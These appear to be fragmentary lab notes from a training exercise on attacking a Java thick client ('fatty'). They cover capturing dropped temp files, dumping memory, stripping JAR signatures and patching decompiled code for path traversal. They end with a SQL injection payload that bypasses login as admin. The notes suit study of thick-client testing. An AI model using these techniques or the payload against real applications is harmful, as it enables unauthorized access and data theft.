ProcMon - monitoring the process reveals that the executable indeed creates a temp file
In order to capture the files, it is required to change the permissions of the Temp folder to disallow file deletions
To do this, we right-click the folder C:\Users\Matt\AppData\Local\Temp and under Properties -> Security -> Advanced -> cybervaca -> Disable inheritance -> Convert inherited permissions into explicit permissions on this object -> Edit -> Show advanced permissions, we deselect the Delete subfolders and files, and Delete checkboxes.
Two files are being dropped by the batch file and being deleted. Try to retrieve the content of the 2 files, by modifying the batch script and removing the deletion
Remove user part and del part. Also change echo $salida
x64dbg, navigate to Options -> Preferences, and uncheck everything except Exit Breakpoint
file -> open and select the restart-service.exe to import it and start the debugging. Once imported, we right click inside the CPU view and Follow in Memory Map
MAP and protection set to -RW--
double-click on it
Return to the Memory Map pane, then export the newly discovered mapped item from memory to a dump file by right-clicking on the address and selecting Dump Memory to File. Running strings on the exported file
A server has been reconfigured to run on port 1337 instead of 8000.
The login credentials for login in the client application are ****/*
The client attempts to connect to the server.fatty.htb subdomain
Below is showcased an example on how to approach DNS requests from applications in your favour. Verify the contents of the C:\Windows\System32\drivers\etc\hosts file where the IP 172.16.17.114 is pointed to fatty.htb and server.fatty.htb
C:\> cat fatty-client\beans.xml
<SNIP>
<!-- Here we have an constructor based injection, where Spring injects required arguments inside the
constructor function. -->
<bean id="connectionContext" class = "htb.fatty.shared.connection.ConnectionContext">
<constructor-arg index="0" value = "server.fatty.htb"/>
<constructor-arg index="1" value = "8000"/>
</bean>
<!-- The next to beans use setter injection. For this kind of injection one needs to define an default
constructor for the object (no arguments) and one needs to define setter methods for the properties. -->
<bean id="trustedFatty" class = "htb.fatty.shared.connection.TrustedFatty">
<property name = "keystorePath" value = "fatty.p12"/>
</bean>
<bean id="secretHolder" class = "htb.fatty.shared.connection.SecretHolder">
<property name = "secret" value = "clarabibiclarabibiclarabibi"/>
</bean>
<SNIP>
set the port to 1337
secret is clarabibiclarabibiclarabibi.
Running the edited application will fail due to an SHA-256 digest mismatch. The JAR is signed, validating every file's SHA-256 hashes before running. These hashes are present in the file META-INF/MANIFEST.MF.
remove the hashes from META-INF/MANIFEST.MF and delete the 1.RSA and 1.SF files from the META-INF directory. The modified MANIFEST.MF should end with a new line.
Save the source code by pressing the Save All Sources option in jdgui. Decompress the fatty-client-new.jar.src.zip by right-clicking and selecting Extract files.
The file fatty-client-new.jar.src/htb/fatty/client/methods/Invoker.java handles the application features
publicStringshowFiles(String folder) throws MessageParseException, MessageBuildException, IOException {String methodName = (newObject() { }).getClass().getEnclosingMethod().getName();logger.logInfo("[+] Method '"+ methodName +"' was called by user '"+this.user.getUsername() +"'.");if (AccessCheck.checkAccess(methodName,this.user))return"Error: Method '"+ methodName +"' is not allowed for this user account"; this.action=newActionMessage(this.sessionID,"files");this.action.addArgument(folder);sendAndRecv();if (this.response.hasError())return"Error: Your action caused an error on the application server!"; returnthis.response.getContentAsString(); }
showFiles function takes in one argument for the folder name and then sends the data to the server using the sendAndRecv() call. The file fatty-client-new.jar.src/htb/fatty/client/gui/ClientGuiTest.java sets the folder option
configs.addActionListener(newActionListener() {publicvoidactionPerformed(ActionEvent e) {String response ="";ClientGuiTest.this.currentFolder="configs";try { response =ClientGuiTest.this.invoker.showFiles("configs"); } catch (MessageBuildException|htb.fatty.shared.message.MessageParseException e1) {JOptionPane.showMessageDialog(controlPanel,"Failure during message building/parsing.","Error",0); } catch (IOException e2) { JOptionPane.showMessageDialog(controlPanel, "Unable to contact the server. If this problem remains, please close and reopen the client.", "Error", 0);
} textPane.setText(response); } });
This generates several class files. Let's create a new folder and extract the contents of fatty-client.jar into it.
C:\> mkdir raw
C:\> cp fatty-client-new.jar raw\fatty-client-new-2.jar
Navigate to the raw directory and decompress fatty-client-new-2.jar by right-clicking and selecting Extract Here
Navigate to the raw directory and decompress fatty-client-new-2.jar by right-clicking and selecting Extract Here. Overwrite any existing htb/fatty/client/gui/*.class files with updated class files.
Exploiting Web Vulnerabilities in Thick-Client Applications
C:\> cd raw
C:\> jar -cmf META-INF\MANIFEST.MF traverse.jar .
Log in to the application and navigate to FileBrowser -> Config option
Listing the content of the start.sh file reveals that fatty-server.jar is running inside an Alpine Docker container.
Modify the open function in fatty-client-new.jar.src/htb/fatty/client/methods/Invoker.java to download the file fatty-server.jar
importjava.io.FileOutputStream;<SNIP>public String open(String foldername, String filename) throws MessageParseException, MessageBuildException, IOException {
String methodName = (newObject() {}).getClass().getEnclosingMethod().getName();logger.logInfo("[+] Method '"+ methodName +"' was called by user '"+this.user.getUsername() +"'.");if (AccessCheck.checkAccess(methodName,this.user)) {return"Error: Method '"+ methodName +"' is not allowed for this user account"; }this.action=newActionMessage(this.sessionID,"open");this.action.addArgument(foldername);this.action.addArgument(filename);sendAndRecv();String desktopPath =System.getProperty("user.home") +"\\Desktop\\fatty-server.jar";FileOutputStream fos =newFileOutputStream(desktopPath);if (this.response.hasError()) {return"Error: Your action caused an error on the application server!"; }byte[] content =this.response.getContent();fos.write(content);fos.close();return"Successfully saved the file to "+ desktopPath;}<SNIP>
Rebuild the JAR file by following the same steps and log in again to the application. Then, navigate to FileBrowser -> Config, add the fatty-server.jar name in the input field, and click the Open button.
C:\> ls C:\Users\cybervaca\Desktop\
...SNIP...
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/25/2023 11:38 AM 10827452 fatty-server.jar
SQL Injection
Decompiling the fatty-server.jar using JD-GUI reveals the file htb/fatty/server/database/FattyDbSession.class that contains a checkLogin() function that handles the login functionality
publicUsercheckLogin(User user) throws LoginException {<SNIP> rs = stmt.executeQuery("SELECT id,username,email,password,role FROM users WHERE username='" + user.getUsername() + "'");
<SNIP>if (newUser.getPassword().equalsIgnoreCase(user.getPassword()))return newUser; thrownewLoginException("Wrong Password!");<SNIP> this.logger.logError("[-] Failure with SQL query: ==> SELECT id,username,email,password,role FROM users WHERE username='" + user.getUsername() + "' <==");
this.logger.logError("[-] Exception was: '"+e.getMessage() +"'");returnnull;
The login button creates the new object ClientGuiTest.this.user for the User class. It then calls the setUsername() and setPassword() functions with the respective username and password values.
The jar file is not created (don't know why, but two .class file are generated): fatty-client-new.jar.src\htb\fatty\shared\resources\*.class
Copy the .class files to raw directory
Create jar file
PS C:\Users\cybervaca\Desktop\raw> jar -cmf META-INF\MANIFEST.MF sqli.jar .
Attempt to log in using the payload abc' UNION SELECT 1,'abc','a@b.com','abc','admin in the username field and the random text abc in the password field.
